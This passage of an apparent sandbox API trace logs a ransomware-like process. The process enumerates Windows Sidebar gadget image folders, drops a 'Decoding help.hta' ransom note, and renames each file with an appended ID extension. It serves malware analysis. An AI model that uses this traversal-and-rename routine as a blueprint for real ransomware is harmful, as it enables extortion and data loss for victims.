returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png" [0059.418] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png" [0059.418] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.418] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot_lrg.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot_lrg.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.381] FindNextFileW (in: hFindFile=0x5a5e30, lpFindFileData=0x2951fd30 | out: lpFindFileData=0x2951fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb949c256, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb949c256, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb7e3aa9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="dial_lrg.png", cAlternateFileName="")) returned 1 [0060.381] lstrcpyW (in: lpString1=0x2528fe40, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0060.381] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0060.381] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" [0060.381] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta")) returned 0x1 [0060.382] lstrcmpiW (lpString1="Decoding help.hta", lpString2="dial_lrg.png") returned -1 [0060.382] lstrlenW (lpString="dial_lrg.png") returned 12 [0060.382] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0060.382] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0060.382] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="dial_lrg.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png" [0060.382] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png" [0060.382] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]" [0060.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.382] FindNextFileW (in: hFindFile=0x5a5e30, lpFindFileData=0x2951fd30 | out: lpFindFileData=0x2951fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb949c256, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb949c256, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb94b1a3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc03, dwReserved0=0x0, dwReserved1=0x0, cFileName="dial_lrg_sml.png", cAlternateFileName="")) returned 1 [0060.382] lstrcpyW (in: lpString1=0x2528fe40, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0060.382] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0060.382] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" [0060.382] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta")) returned 0x1 [0060.382] lstrcmpiW (lpString1="Decoding help.hta", lpString2="dial_lrg_sml.png") returned -1 [0060.382] lstrlenW (lpString="dial_lrg_sml.png") returned 16 [0060.382] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0060.382] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0060.382] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="dial_lrg_sml.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png" [0060.382] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png" [0060.382] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png.[ID]g9uZrLhJaygpwRm1[ID]" [0060.383] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg_sml.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg_sml.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.306] FindNextFileW (in: hFindFile=0x5a5e30, lpFindFileData=0x2951fd30 | out: lpFindFileData=0x2951fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb94760f7, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb94760f7, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb94b1a3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="dial_sml.png", cAlternateFileName="")) returned 1 [0061.306] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.306] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0061.306] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" [0061.306] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta")) returned 0x1 [0061.306] lstrcmpiW (lpString1="Decoding help.hta", lpString2="dial_sml.png") returned -1 [0061.306] lstrlenW (lpString="dial_sml.png") returned 12 [0061.306] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.306] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0061.306] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="dial_sml.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png" [0061.306] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png" [0061.306] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.306] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_sml.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_sml.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.306] FindNextFileW (in: hFindFile=0x5a5e30, lpFindFileData=0x2951fd30 | out: lpFindFileData=0x2951fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb95347d2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb95347d2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb9b3d6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x134, dwReserved0=0x0, dwReserved1=0x0, cFileName="glass.png", cAlternateFileName="")) returned 1 [0061.306] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.306] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0061.306] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" [0061.307] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta")) returned 0x1 [0061.307] lstrcmpiW (lpString1="Decoding help.hta", lpString2="glass.png") returned -1 [0061.307] lstrlenW (lpString="glass.png") returned 9 [0061.307] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.307] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 72 [0061.307] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="glass.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png" [0061.307] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png" [0061.307] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.307] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\glass.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\glass.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.985] FindNextFileW (in: hFindFile=0x5a5e30, lpFindFileData=0x2951fd30 | out: lpFindFileData=0x2951fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb95347d2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb95347d2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb9b6381c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="glass_lrg.png", cAlternateFileName="")) returned 1 Thread: id = 867 os_tid = 0xafc [0054.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*", lpFindFileData=0x2965fd30 | out: lpFindFileData=0x2965fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8199177f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8199177f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8a50 [0056.267] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.267] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x2965fd30 | out: lpFindFileData=0x2965fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8199177f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8199177f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.267] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.267] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.267] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x2965fd30 | out: lpFindFileData=0x2965fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc467a55c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xc467a55c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xc48435dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1369, dwReserved0=0x0, dwReserved1=0x0, cFileName="16-on-black.gif", cAlternateFileName="")) returned 1 [0056.618] lstrcpyW (in: lpString1=0x2aaa8f90, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0056.618] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 77 [0056.618] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" [0056.618] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\decoding help.hta")) returned 0xffffffff [0056.618] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa30 [0058.215] WriteFile (in: hFile=0xa30, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2965fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2965fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.216] CloseHandle (hObject=0xa30) returned 1 [0058.216] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.217] lstrcmpiW (lpString1="Decoding help.hta", lpString2="16-on-black.gif") returned 1 [0058.217] lstrlenW (lpString="16-on-black.gif") returned 15 [0058.217] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0058.217] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 77 [0058.217] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="16-on-black.gif" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif" [0058.217] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif" [0058.217] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif.[ID]g9uZrLhJaygpwRm1[ID]" [0058.217] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\16-on-black.gif"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\16-on-black.gif.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.079] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x2965fd30 | out: lpFindFileData=0x2965fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba5b8003, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba5b8003, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc4f4167c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x125, dwReserved0=0x0, dwReserved1=0x0, cFileName="buttonDown_Off.png", cAlternateFileName="")) returned 1 [0059.079] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0059.079] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 77 